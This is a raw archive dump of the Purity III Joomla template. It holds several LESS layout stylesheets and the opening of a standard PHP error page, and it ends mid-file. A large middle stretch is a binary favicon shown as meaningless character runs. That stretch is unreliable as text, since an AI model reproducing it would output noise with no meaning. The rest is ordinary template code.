  .nav .input-group-addon [class*=" icon-"],
  .nav .input-group-addon .fa {
    margin-right: 0;
  }

  // End
}PKԜ�\g�F��!purity_iii/less/layouts/blog.lessnu&1i�/**
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org
 *------------------------------------------------------------------------------
 */


// VARIABLES & MIXINS
// ------------------
@import "../vars.less"; // Modify this for custom colors, font-sizes, etc


// ---------------------------------------------------------
// MAGAZINE LAYOUT
// ---------------------------------------------------------
.blog {

  .blog-item {
    border-bottom: 1px solid @gray-lighter;
    margin-bottom: @t3-global-margin * 2;
    padding-bottom: @t3-global-padding * 2;

    // Item image
    // ----------
    .item-image {
      margin-top: 7px;
      margin-right: 0;

      &.pull-left {
        max-width: 100%;

        @media screen and (max-width: @screen-xs-max) {
          float: none !important;
        }
      }

      img {
        max-width: 100%;
        width: 100%;
      }
    }

    // Page header
    // -----------
    .page-header {
      border: 0;
      margin: 0 0 (@t3-global-margin / 2);
      padding: 0;

      h2 {
        margin: 0;
        line-height: 1.3;

        a {
          // Hover states
          &:hover, &:focus, &:active {
            color: @link-hover-color;
          }
        }
      }
    }

    // Item intro
    .article-intro {
      margin-bottom: @t3-global-margin;
    }

  }


  // Item page
  // ---------
  .item-page {
    .tags {
      border-bottom: 1px solid @t3-border-color;
      margin-bottom: @t3-global-margin;

      span a {
        background: @gray-lighter;
      }
    }
  }
}PKԜ�\�r@�
�
%purity_iii/less/layouts/porfolio.lessnu&1i�/**
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org
 *------------------------------------------------------------------------------
 */


// VARIABLES & MIXINS
// ------------------
@import "../vars.less"; // Modify this for custom colors, font-sizes, etc


// ---------------------------------------------------------
// PORFOLIO LAYOUT
// ---------------------------------------------------------

// Page header
// ---------------------
.porfolio .page-header {
  text-align: center;
  border-bottom: 0;
  margin-top: @t3-global-margin / 2;
  margin-bottom: 0;
  padding: 0;
}


// Porfolio Items
// ---------------------
.porfolio-items {
  margin-top: @t3-global-margin;
  padding-top: @t3-global-padding;
  border-top: 1px solid @t3-border-color;
  text-align: center;

  .thumbnail {
    border: 0;
    padding: 0;
    margin: @t3-global-margin 0;
  }

  // Link
  .thumbnail > a {
    color: @text-color;
    text-decoration: none;
    // Links states
    &:hover, &:active, &:focus {
      color: @link-color;
      text-decoration: none;
    }
  }

  // Image
  .item-image {
    float: none !important;
    border: 1px solid @t3-border-color;
    padding: 3px;
    position: relative;
    .transition(border-color 0.2s ease-in);
    img {
      width: 100%;
      padding: 0;
    }
  }

  .thumbnail > a {
    &:hover, &:active, &:focus {
      .item-image {
        border-color: darken(@t3-border-color, 20%);
      }
      .item-image img {
        opacity: .7;
      }
    }
  }

  // Title
  h3 {
    margin-top: @t3-global-margin;
    margin-bottom: 5px;
    font-weight: 700;
    font-size: @font-size-large;
  }

  // Intro 
  p {
    color: @gray;
    margin: 0;
  }

}


// Porfolio Extra Fields
// ---------------------
.porfolio {
  // State
  .item-state {
    width: 70px;
    height: 70px;
    background: url(../../images/porfolio-item-states.png) no-repeat center top;
    display: block;
    text-indent: -9999em;
    position: absolute;
    top: -3px;
    right: -3px;
  }

  .state-free {
    background-position: center;
  }

  .state-hot {
    background-position: center bottom;
  }

  // Demo URL
  .item-demo-url {
    display: inline-block;
    margin-top: @t3-global-margin;
  }
}

PKԜ�\g�7���&purity_iii/less/layouts/corporate.lessnu&1i�/**
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org
 *------------------------------------------------------------------------------
 */


// VARIABLES & MIXINS
// ------------------
@import "../vars.less"; // Modify this for custom colors, font-sizes, etc


// ---------------------------------------------------------
// CORPORATE LAYOUT
// ---------------------------------------------------------

//
// Generic Corporate Layout
// --------------------------------------------------------
.corporate {

  // Slideshow
  // ----------------------------
  .slideshow {
    background: @gray-lightest;
    border-bottom: 1px solid @gray-lighter;
    padding: (@t3-global-padding * 2) 0;
  }

  // Spotlight 1
  // ----------------------------
  .t3-sl-1 {
    border-bottom: 1px solid @gray-lighter;
  }

  .t3-sl-1 .t3-module,
  .t3-sl-2 .t3-module,
  .t3-sl-3 .t3-module {
    margin-bottom: 0;
  }

  // Spotlight 2
  // ----------------------------
  .t3-sl-2 {
    padding: 0;
  }

  .carousel-caption {
    background: rgba(0, 0, 0, 0.3);
  }

  // Media module
  // ----------------------------
  .t3-module .media {
    border-bottom: 1px solid @gray-lighter;
    padding-bottom: @t3-global-padding / 2;

    &:last-child {
      border: 0;
      padding: 0;
    }
  }

}


// ---------------------------------------------------------
// JOOMLA OVERRIDE
// ---------------------------------------------------------
.corporate {
  .items-leading {
    border-bottom: 1px solid @gray-lighter;
    margin-bottom: @t3-global-margin * 2;
  }

  .items-row {
    border-bottom: 1px solid @gray-lighter;

    &:last-child {
      border: 0;
    }
  }
}
PKԜ�\6RD��+purity_iii/less/layouts/features-intro.lessnu&1i�/**
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org
 *------------------------------------------------------------------------------
 */


// VARIABLES & MIXINS
// ------------------
@import "../vars.less"; // Modify this for custom colors, font-sizes, etc


// ---------------------------------------------------------
// FEATURES INTRO LAYOUT
// ---------------------------------------------------------PKԜ�\H;��_
_
!purity_iii/less/layouts/docs.lessnu&1i�/**
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org
 *------------------------------------------------------------------------------
 */


// VARIABLES & MIXINS
// ------------------
@import "../vars.less"; // Modify this for custom colors, font-sizes, etc


//
// DEMO TYPOGRAPHY
// --------------------------------------------------------
// Used for Typography Page. Removed if you don't want it :)

.docs-section {
  margin-bottom: @t3-global-margin * 2;
  .page-header {
    margin-bottom: @t3-global-margin;
    h1 {
      font-size: floor(@font-size-base * 3);
    }
  }
}


// Core Typo
// ----------------
.example-type {
  h1,h2,h3,h4,h5,h6 {
    margin: @t3-global-margin 0;
  }
}


// Color Swatches
// ----------------
.example-colors {
  .swatch-item {
    width: 100%;
    min-height: 100px;
    position: relative;
    background: @gray-dark;
    color: #fff;
    margin-bottom: @t3-global-margin;
    dl {
      width: 100%;
      position: absolute;
      bottom: 0;
      padding: 20px;
      margin: 0;
    }
  }
  // The colors
  .color-brand-primary {
    background: @brand-primary;
  }
  .color-brand-secondary {
    background: @brand-secondary;
  }
  .color-brand-success {
    background: @brand-success;
  }
  .color-brand-danger {
    background: @brand-danger;
  }
  .color-brand-warning {
    background: @brand-warning;
  }
  .color-brand-info {
    background: @brand-info;
  }
  // TGrayscale Levels
  .color-gray-darker {
    background: @gray-darker;
  }
  .color-gray-dark {
    background: @gray-dark;
  }
  .color-gray {
    background: @gray;
  }
  .color-gray-light {
    background: @gray-light;
    color: @gray-dark;
  }
  .color-gray-lighter {
    background: @gray-lighter;
    color: @gray-dark;
  }
  .color-gray-lightest {
    background: @gray-lightest;
    color: @gray-dark;
  }
}


// Forms
// ----------------
.example-buttons,
.example-inputs {
  .btn,
  .form-control {
    width: 100%;
    margin-bottom: @t3-global-margin;
  }
}PKԜ�\��O�``%purity_iii/less/layouts/magazine.lessnu&1i�/**
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org
 *------------------------------------------------------------------------------
 */


// VARIABLES & MIXINS
// ------------------
@import "../vars.less"; // Modify this for custom colors, font-sizes, etc


// ---------------------------------------------------------
// MAGAZINE LAYOUT
// ---------------------------------------------------------

// Clearfix
// ----------------------------
.magazine-item,
.magazine-featured-leading,
.magazine-featured-intro,
.magazine-category {
  .clearfix();
}


//
// Generic Magazine Elements
// --------------------------------------------------------

// Page Sub Header
// ----------------------------
.magazine .page-subheader {
  h2 {
    font-size: @font-size-h1;
  }
}


// Category Title
// ----------------------------
.magazine-category-title {
  margin-bottom: @t3-global-margin;
  font-size: @font-size-large;
  background: @gray-lighter;
  padding: (@t3-global-padding / 2);
  strong {
    font-weight: 600;
  }
  .fa {
    font-size: 14px;
    position: relative;
    top: -1px;
    left: 2px;
  }
  > a {
    display: inline-block;
    color: @text-color;
    text-transform: uppercase;
    // Link states
    &:hover, &:active, &:focus {
      text-decoration: none;
      color: @brand-primary;
    }
  }
}


// Titles
// ----------------------------
.magazine-item .page-header {
  padding-bottom: 0;
  margin-bottom: 5px;
  border-bottom: 0;
  h2 {
    margin: 0;
    font-size: @t3-font-size-bigger;
    line-height: 1.275;
    font-weight: 700;
    a {
      // Link states
      &:hover, &:active, &:focus {
        text-decoration: none;
      }
    }
  }
}


// Images
// ----------------------------
.magazine-item {
  .item-image {
    overflow: hidden;
  }
  .item-image,
  .pull-left.item-image,
  .pull-right.item-image {
    width: 100%;
    max-width: 100%;
    float: none !important;
    margin-bottom: @t3-global-margin;
  }
  .item-image img,
  .pull-left.item-image img,
  .pull-right.item-image img,
  .img_caption {
    width: 100% !important;
    max-width: 100%;
  }
}


// Metadata
// ----------------------------
.magazine-item .article-aside {
  margin-top: @t3-global-margin / 2;
  margin-bottom: @t3-global-margin / 2;
}

.magazine-item .article-info {
  color: @gray-light;
  margin: 0;
  width: 100%;
  dd {
    white-space: inherit;
  }
}


// Content
// ----------------------------
.magazine-item-ct {
  p:last-child {
    margin-bottom: 0;
  }
}


// Leading Items
// ----------------------------
.magazine-leading {
  margin-bottom: @t3-global-margin;
  .magazine-item {
    margin-bottom: @t3-global-margin;
    // Titles
    .page-header h2 {
      font-size: @font-size-h2;
    }
    // Images
    .item-image {

      // Larger margin on Tablet / Desktop
      @media screen and (min-width: @screen-sm) {
        max-height: @line-height-computed * 15;
      } 
    }
    // Intro Text
    .magazine-item-ct {
      font-size: @t3-font-size-bigger;
    }
  }
}


// Intro Items
// ----------------------------
.magazine-intro {
  margin-bottom: @t3-global-margin;
  .magazine-item {
    margin-bottom: @t3-global-margin;
    // Images
    .item-image {
      max-height: @line-height-computed * 6;
      // Hide image caption
      p.img_caption {
        display: none;
      }
    }
  }
}


// Links Item
// ----------------------------
.magazine-links {
  margin-top: @t3-global-margin * 2;
  &::before {
    display: inline-block;
    content: "MORE NEWS";
    background: @gray-dark;
    font-weight: normal;
    padding: 5px 10px;
    margin-bottom: 10px;
    color: #fff;
  }
  .link-item {
    border-bottom: 1px solid @t3-border-color;
    padding: (@t3-global-padding/2) 0 ((@t3-global-padding/2) - 1px);
  }
  .page-header {
    margin: 0;
    h2 {
      font-size: @t3-font-size-bigger;
    }
  }
  // Metadata {
  .article-aside {
    margin-top: 5px;
    margin-bottom: 0;
  }
}



//
// Magazine Featured
// --------------------------------------------------------
.magazine-featured {
}


// Featured Leading Items
// ----------------------------
.magazine-featured-leading {
  .magazine-item {
  }
}


// Featured Intro Items
// ----------------------------
.magazine-featured-intro {
}


// Featured Intro Links
// ----------------------------
.magazine-featured-links {
  margin-top: 0;
  margin-bottom: @t3-global-margin * 2;
}



//
// Magazine Category
// --------------------------------------------------------
.magazine-category {
  margin-bottom: @t3-global-margin * 2;

  // Row
  .row-articles {
    margin-bottom: @t3-global-margin;
    &:last-child {
      margin-bottom: 0;
    }

    // Remove Padding on Desktop
    @media screen and (min-width: @screen-md) {
      .magazine-item-media {
        padding-right: 0;
      }
    }

  }

  // Leading
  .magazine-leading {
    margin-bottom: @t3-global-margin * 2;
  }

  // Images
  .magazine-item {
    .item-image {
    }
  }

  // Metadata 
  .magazine-item {
    // Hide Category Info
    .category-name {
      display: none;
    }
  }

  // Text Intro
  .magazine-item-ct {
    color: @gray;
    font-size: @t3-font-size-smaller;
  }
}

PKԜ�\rZ*W&}&}purity_iii/favicon.iconu&1i� hF   ��00 �%V@@ (B�:(  #.#.��CC�cc�KK�66������""��CC���KK�ff�����������00��SS�22��EE�����&&��,,��--��99��uu�����������

��__�AA�--��&&����11��DD�66��EE�ZZ�������������cc�UU���$$��77��VV�SS���ll���������������99����RR���TT�KK�11��88�TT�����������������WW�EE�''����YY���^^�������������������))��\\�%%����PP�@@�OO�22������������������

��bb�����ee�OO�::��&&��������������������ee���AA�XX�HH�>>�88������������������00��CC�''��cc�..��==�NN�LL�����������������KK�77����88����..��QQ�QQ�����������������88��WW�**��11��NN���JJ�EE�������������������EE�  ��99��FF�??�nn�""��������������������44��""��$$����--��$$����������������������++��YY�@@�BB��,,��������������������������MM�GG�gg�����������������( @ #.#.����GG�88�����__�%%��""��##��������������55��??��TT�����>>�~~�33��ss���������������������DD�FF�nn�PP�aa�������&&������������JJ�VV�55������xx�00��AA��������������������������jj�77��HH�""����OO�]]�����������DD��[[�����BB�hh���rr��������������������������FF�nn�OO�HH�����ss�����������@@�22��

����kk�))�������bb�����������������������

�����XX�XX�DD���TT�;;��������##��00��77��&&��::��[[���::����//��������������������������..�����$$��OO���''��ZZ���������44�����88��[[������������������������������������������ee���%%����HH�������ee�qq����44��88����++�����88���������������������������[[���������

����$$��++��))�����QQ�//��ll�CC����������������������������������������!!����������oo�##��		����cc������ZZ�dd�����33�����**��������������������������������

�����~~�ii����  ��

��""�����##��kk�FF���������������������������������������������NN������DD�MM�����;;�cc�||�����++�����))������������������������������������		�����UU���NN�������II�{{�����~~�rr���������������������������������������RR����		��<<��??��

��**���������$$�����""��55��CC����������������������������������������CC���00��((����--�������aa�YY�33��::��II�**���������������������������������������qq���������VV����((���''��55��00����		������������������������������������VV���������������bb�88��dd���ZZ�22����������������������������������������^^����������''��pp�33��hh�88����aa���88�����������������������������������������dd��������88�JJ�jj������77��^^�44��UU�����������������������������������11���������OO����22��JJ�//��SS�##��dd�QQ�XX�YY�����������������������������������tt�ff�����>>����AA�22����,,��EE�gg�$$��rr�;;���������������������������������������  ��������kk�77��33����

��hh�dd������$$����������������������������������AA����88��TT�������&&��KK�����TT�RR�??�������������������������������������������ee�YY�[[�++����11��||�����  ����\\����������������������������������������==��������99����MM����44�����������mm���������������������������������������ll�44������''��ee�FF���������  �����JJ���������������������������������������ee�99��00��..��99��55����//��((��<<������������������������������������������������>>��JJ�""����88����00����66��bb�XX�������������������������������������������

��OO�����11������..����������������������������������������������������gg�//��((��^^�##����mm�KK�������������������������������������������������KK�������__�::��""��NN��ii���������������������������������������������������oo�UU�11��__�jj����22����������������������������������������������������44��<<����NN�}}�DD���������������������������������(0` $#.#.������JJ�44��EE�������33����������������������������		��==��==��AA��jj�!!��������pp����22��;;��hh�

������������������������������OO�RR���������XX�JJ�QQ�bb������������������������cc�//��__�;;��������KK����BB����ii����������������������������������**��tt�;;�FF�ww�""��JJ����{{����xx�������������������ff�XX�[[���������yy�zz���  ���������������������������������������gg�ee�--��CC�GG����99�""��55�����--����������������

��\\�kk�??�������UU����88����11���������������������������������������""��}}�\\�**��ll�--�����������^^�����������������TT�RR�++��������ww�gg�����OO���UU�����������������������������������WW����QQ�FF�tt�&&������KK����))��������������--��JJ�++��������UU�tt�00����##����������������������������������������������������--��__�ss����������??�������������HH�//��""��==��

����ww�VV�����AA�������������������������������������������EE����tt���nn�WW�����\\�``�������������<<����PP�vv���OO�kk�**����

��qq����CC�����������������������������������������rr��������dd�!!����++��ll�11������������44��00�����ll���hh�AA�����;;�������������������������������������������������QQ��������44��77������QQ�==��

��������88�rr�zz����++��00��OO�������oo���hh�����������������������������������������..��YY�||��������##������55��LL�������ee����xx�<<�����CC�QQ�%%������77�������������������������������������������������TT����������&&����

��������88������������@@���!!�����LL�DD��������zz����cc���������������������������������������������ll�����������cc�������''����QQ����xx�����xx�{{�22��������33�������������������������������������������������������CC��������������FF�������''���������������jj�$$��������������UU�������������������������������������������������		��XX����##��,,��uu����44������

��LL����>>������KK�

������..�����������������������������������������������������������++�����������oo�\\���������VV�{{�<<����&&��������������JJ�������������������������������������������������������dd����$$����!!��\\�))����������ee�rr����������((���������������������������������������������������������������""�����������TT�BB���������00��cc����������������CC���

��������������������������������������������������������zz����%%����;;��``�++������**����FF�������������rr�

��!!��FF�00��		����������������������������������������������������$$�����[[�����NN�==����11��22����WW��������ee����::���DD�UU�bb�//�����������������������������������������������������������##������..��--��##������vv�����������[[���PP�GG���OO�BB�����������������������������������������������������ee����33�������������!!����������>>�����33��

��??��22������������������������������������������������������������..�����EE�������������==����jj������yy�����TT�OO����������������������������������������������������������������bb�

������

�������������������44����BB�oo�;;�����������������������������������������������������������������cc�������		����$$�����~~���MM��������[[�\\���##��99��������������������������������������������������������HH���CC�������;;�\\�''��EE�66��44�����RR�����mm�MM���II�JJ�������������������������������������������������������������))������33���������LL�tt�������,,����''�����HH�$$��kk�SS�����������������������������������������������������##����[[�������mm����jj���VV�FF�00��ff�DD�

��QQ����<<�99����LL�����������������������������������������������������nn����!!������

��kk����LL�22��LL�����''��bb���jj�{{�$$��MM����33���������������������������������������������������������oo���������MM����nn�11��HH�����

��bb�55��nn�KK�		��``��������������������������������������������������������//�����&&����������))��~~�oo�$$��NN�������;;��vv�ww�&&��������������������������������������������������������������ll������..��

������

��55��33��&&��YY������������~~���88�����������������������������������������������������������������������II�����������,,��qq���������rr�``���__����tt�����������������������������������������������������gg����@@����tt�gg�66��������55�����44��������::��&&����������II�������������������������������������������������������������))����OO�ss�FF�����RR����KK��������������������������������������������������������������������������,,�����^^�������33��""����``����ll�##����������22�����������������������������������������������������������������mm�zz�����������EE�uu�aa�SS�������II�		����yy����{{�����������������������������������������������������������gg�SS�����//��##��++��\\�ZZ���''�����]]�������������BB�����������������������������������������������������������ww�TT�99��<<��**��33��;;��,,��!!����������55��bb�������qq�

������������������������������������������������������������EE��\\�BB��++������;;��//����>>��!!��		��66��dd�yy�uu�LL�����������������������������������������������������������������..��RR�&&������66��33��

��%%��((��		����((��))����������������������������������������������������������������������##��mm�((������**��--��������GG���������������������������������������������������������������������������%%�����33����&&��UU�@@������''�����UU�������������������������������������������������������������������������

�����]]�..��ww����KK�77��22��&&��uu������������������������������������������������������������������������������bb����������ee�22��AA�55����\\�������������������������������������������������������������������������������,,��������SS�##��99��99��**��QQ����PP��		����������������������������������������������������������������������������33��,,��((��++��[[������������

������������������������������������������������������������������������������22��UU�DD������**��XX�99����������������������������������������������������(@� @#.#.��������>>��PP�!!��TT�������cc�--����������������������������������������>>��>>��<<��LL�mm�00����������<<��������::��//��PP�\\�����������������������������������������CC�\\�00��11��{{�����GG�99��--��00��>>�NN�))��������������������������,,��SS�55��DD�XX�LL���������&&��qq����]]�!!��66��������%%����������������������������������������;;��bb�SS���PP�����KK�MM�nn�uu�||����gg�������������������������88��hh�;;��PP�[[�""����������II����``���

��SS�������33������������������������������������������SS����//��..�����AA���88�������yy�������aa�����������������������22��hh�``�]]�FF�

��������++��nn����77���������������**������������������������������������������99�����RR�,,��<<��NN�55����GG�EE�00��AA�����������������������������,,��cc�mm�VV�//����������__����cc����������������������������������������������������������bb�ww�OO���__�[[�����������bb����88��

��������������������++��[[�cc�FF�����������������))������((��������gg�������������������������������������������������������OO�ii�OO���������II����kk�))��������������������11��RR�FF�22����������KK����ee�

������PP�����,,������������������������������������������������^^����||�88�II��JJ�������&&��__����==�����������������##��>>��FF�++��  ��������''�����hh�11������88����������

������������������������������������������������##��uu����MM�22��ff�uu�JJ�����

��99�����MM�		����������������99��CC��11��!!��--��,,����

��CC����II�������XX�������qq���������������������������������������������������HH������==����xx�yy�;;��������tt�^^�))��������������

��BB��77����11��YY�UU���00��ff�vv�,,��������uu������<<������������������������������������������������������``������

��))��XX�aa�������TT�ll�MM���������������,,������dd����ff���OO�uu�==�������??�������VV�������������������������������������������������������!!�������88���33��^^�--������++��bb�]]�

��������������22��77��II�������CC���YY�hh�������

�����������11������������������������������������������������������������������  ����<<��::��������HH�ZZ�����������

��!!��YY�pp�������jj���11��QQ�DD��������������������������������������������������������������������������>>��[[�������//������..��������77��UU�::����������NN�������mm�WW����aa�22��MM�88����������]]�����((��������������������������������������������������������33�����``�������66��������

������  ��>>��DD������  ��kk�������``�44��00��{{�ff�CC��QQ�''��������<<�����������������������������������������������������������������;;�������������XX�%%������������		��""��>>������[[������BB�

��		��33��||�gg�>>��==����������cc������GG�����������������������������������������������������������MM�����������������^^�&&����������55����99������ll�����44��vv��SS�$$����������55�������[[���������������������������������������������������������������LL��������������������bb�������%%����--��������ll�����CC����xx�EE�����������}}������33������������������������������������������������������������������..����������vv���������YY�����������??������������HH����ii�55��

����������������]]���������������������������������������������������������������������77�����������EE�������NN�����

������������SS���PP����SS�����������``�����������������������������������������������������������������������������������``�����==����dd�++����������66��ll��66��ee����88��

��������66������jj�������������������������������������������������������������������������hh������++������CC�aa�KK������������99��{{�\\�||����##����������]]������$$����������������������������������������������������������������������������������MM�

������MM�SS�������������GG��nn����xx���������::��������TT�����������������������������������������������������������������������������hh������AA�����GG�aa�,,��������

����&&��EE�zz������������vv������**������

������������������������������������������������������������������������<<�������nn�����66��]]�SS�������%%��""����))��vv�����������������;;������::��66��!!��		����������������������������������������������������������������������LL�����������DD�jj�++������CC�00����,,��������!!������UU����������00��YY�ll�RR�!!����������������������������������������������������������������������,,�������UU�������GG��::��**��))��22����		��<<��������!!����""��������OO���KK�VV�++��OO�aa�LL���������������������������������������������������������������������������������������))��**��##������

��UU�������!!����99�����hh�����YY�QQ���//��KK�BB�����������������������������������������������������������������������__��������������

������������xx����������[[����LL�����EE�99��

����!!������������������������������������������������������������������������		��33��������&&�������������������������uu���??��������77���  ��SS�RR���������������������������������������������������������������������������������������<<�		����������������DD�����::��

��YY����QQ�����>>��ff�VV���

������������������������������������������������������������������������������������OO���������		������$$��tt�����

��

��ii����������ee�ll�BB���������������������������������������������������������������������������������������PP�����������

����11�����UU���::��yy�yy�����&&��yy�SS�  ����88��..��������������������������������������������������������������������������##��������::�����������DD�##��00��[[�WW�11��((��zz�~~�LL�����//�����@@���$$��PP�;;��������������������������������������������������������������������������[[������""��������

��NN����CC�$$��==��>>�==��ZZ����ww�������@@����66����CC��dd�BB�����������������������������������������������������������������������  ������������������II�������FF���HH�nn�||�������hh�����$$��__����33����``�ss�EE�����������������������������������������������������������������������33������??�		��������||������44����RR�WW�GG�FF�rr�ZZ�''����>>�{{����,,��''��{{�yy�AA�����������������������������������������������������������������������[[����||�����������������qq�--��00��TT�22����		��//��RR�II�

��RR����qq�!!��22�����rr�44����������������������������������������������������������������������BB�������UU�����������mm����gg�<<�==��LL���������OO�ZZ���[[����MM���==����aa�����������������������������������������������������������������������YY����oo�**����������

��WW�������DD�55��NN���������@@�aa�99��dd�jj�""����KK����MM�

����������������������������������������������������������������������ii����;;��

������������99��||����;;�..��SS���������''��VV�pp�vv�PP�����dd����@@���������������������������������������������������������������������22��||��������		������������BB�dd�$$��//��ZZ���������

��>>�������DD���44��������;;���������������������������������������������������������������������ii����{{���99��YY���������

����))����77��hh�����������++��������??����YY�������88���������������������������������������������������������������������uu����yy���]]����JJ�,,��������		��		����==�{{�44��

����������uu�bb�**����{{������//����������������������������������������������������������������������RR�������;;��ee����ww�gg�GG�����������FF����RR�����������EE�22������������||�!!������������������������������������������������������������������������bb������TT�,,��,,��XX�tt�bb�00��������^^����ff�$$��������		��""��������������MM�������������������������������������������������������������������������22��zz����ff���

��((��KK�XX�??��������ii����}}�77��������

��

������--�������&&����������������������������������������������������������������������������00��������FF�����		��  ��//��&&����66��nn�����SS�//��--��((����������cc�����

������������������������������������������������������������������������������gg����``�������������((��\\�uu�nn�RR�tt������yy�''������00���������

������������������������������������������������������������������������������^^�oo�OO�������������@@�nn�``�//��$$��ee������UU�������HH�������nn�����������������������������������������������������������������������������$$��ff�bb�<<����$$��22��44��++��00��EE�\\�<<����		��::��aa�==��������66����������77��������������������������������������������������������������������������������oo�kk�II�;;��==��55��  ��88��??��,,��""��������������&&��OO�tt��������PP���������������������������������������������������������������������������������HH�]]�VV�>>��11��  ��

��$$��::��::������99��((����		��((��NN�nn�����yy�LL�������������������������������������������������������������������������������������::��MM�FF�))��

������22��GG������;;��44����

��11��II�SS�PP�55��������������������������������������������������������������������������������������������11��``�55��������..��BB������

��!!������		����������������������������������������������������������������������������������������������������??��ss�77��������""��==��������

��55��RR�++��

��������������������������������������������������������������������������������������������������GG����CC�����$$��EE�NN�  ��������QQ����XX�!!��������������������������������������������������������������������������������������������������::����]]�����ee����gg�99��""��!!��  ��]]����||�55��������������������������������������������������������������������������������������������������''�����||�]]�jj�������JJ�BB��LL�II���##��YY�����NN���������������������������������������������������������������������������������������������������ff�������������cc�44��33��88��00��

��00��tt�����EE����������������������������������������������������������������������������������������������������::����������LL�##��11��22��&&����  ��yy����hh��""������������������������������������������������������������������������������������������������������CC�PP�99�--��++��>>�������������������..��������������������������������������������������������������������������������������������������������))��;;��33��11��''��##��YY������������II�

��������������������������������������������������������������������������������������������������������**��OO�WW�@@��������,,��RR�@@���������������������������������������������������������������������PKԜ�\����purity_iii/error.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Template.system
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
if (!isset($this->error))
{
	$this->error = JError::raiseWarning(404, JText::_('JERROR_ALERTNOAUTHOR'));
	$this->debug = false;
}
//get language and direction
$doc = JFactory::getDocument();
$this->language = $doc->language;
$this->direction = $doc->direction;
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<meta http-equiv="content-type" content="text/html; charset=utf-8" />
	<title><?php echo $this->error->getCode(); ?> - <?php echo htmlspecialchars($this->error->getMessage()); ?></title>
	<link rel="stylesheet" href="<?php echo $this->baseurl; ?>/templates/purity_iii/css/error.css" type="text/css" />
	<?php if ($this->direction == 'rtl') : ?>
	<link rel="stylesheet" href="<?php echo $this->baseurl; ?>/templates/system/css/error_rtl.css" type="text/css" />
	<?php endif; ?>
	<?php
		$debug = JFactory::getConfig()->get('debug_lang');
		if (JDEBUG || $debug)
		{
	?>
		<link rel="stylesheet" href="<?php echo $this->baseurl ?>/media/cms/css/debug.css" type="text/css" />
	<?php
		}
	?>
</head>
<body>
	<div class="error">
		<div id="outline">
		<div id="errorboxoutline">
			<div id="errorboxheader"><?php echo $this->error->getCode(); ?> - <?php echo htmlspecialchars($this->error->getMessage()); ?></div>
			<div id="errorboxbody">
			<p><strong><?php echo JText::_('JERROR_LAYOUT_NOT_ABLE_TO_VISIT'); ?></strong></p>
				<ol>
					<li><?php echo JText::_('JERROR_LAYOUT_AN_OUT_OF_DATE_BOOKMARK_FAVOURITE'); ?></li>
					<li><?php echo JText::_('JERROR_LAYOUT_SEARCH_ENGINE_OUT_OF_DATE_LISTING'); ?></li>
					<li><?php echo JText::_('JERROR_LAYOUT_MIS_TYPED_ADDRESS'); ?></li>
					<li><?php echo JText::_('JERROR_LAYOUT_YOU_HAVE_NO_ACCESS_TO_THIS_PAGE'); ?></li>
					<li><?php echo JText::_('JERROR_LAYOUT_REQUESTED_RESOURCE_WAS_NOT_FOUND'); ?></li>
					<li><?php echo JText::_('JERROR_LAYOUT_ERROR_HAS_OCCURRED_WHILE_PROCESSING_YOUR_REQUEST'); ?></li>
				</ol>
			<p>
				<strong><?php echo JText::_('JERROR_LAYOUT_PLEASE_TRY_ONE_OF_THE_FOLLOWING_PAGES'); ?></strong>
				<a class="btn btn-primary" href="<?php echo $this->baseurl; ?>/index.php" title="<?php echo JText::_('JERROR_LAYOUT_GO_TO_THE_HOME_PAGE'); ?>"><?php echo JText::_('JERROR_LAYOUT_HOME_PAGE'); ?></a>
			</p>

			<p><?php echo JText::_('JERROR_LAYOUT_PLEASE_CONTACT_THE_SYSTEM_ADMINISTRATOR'); ?>.</p>
			
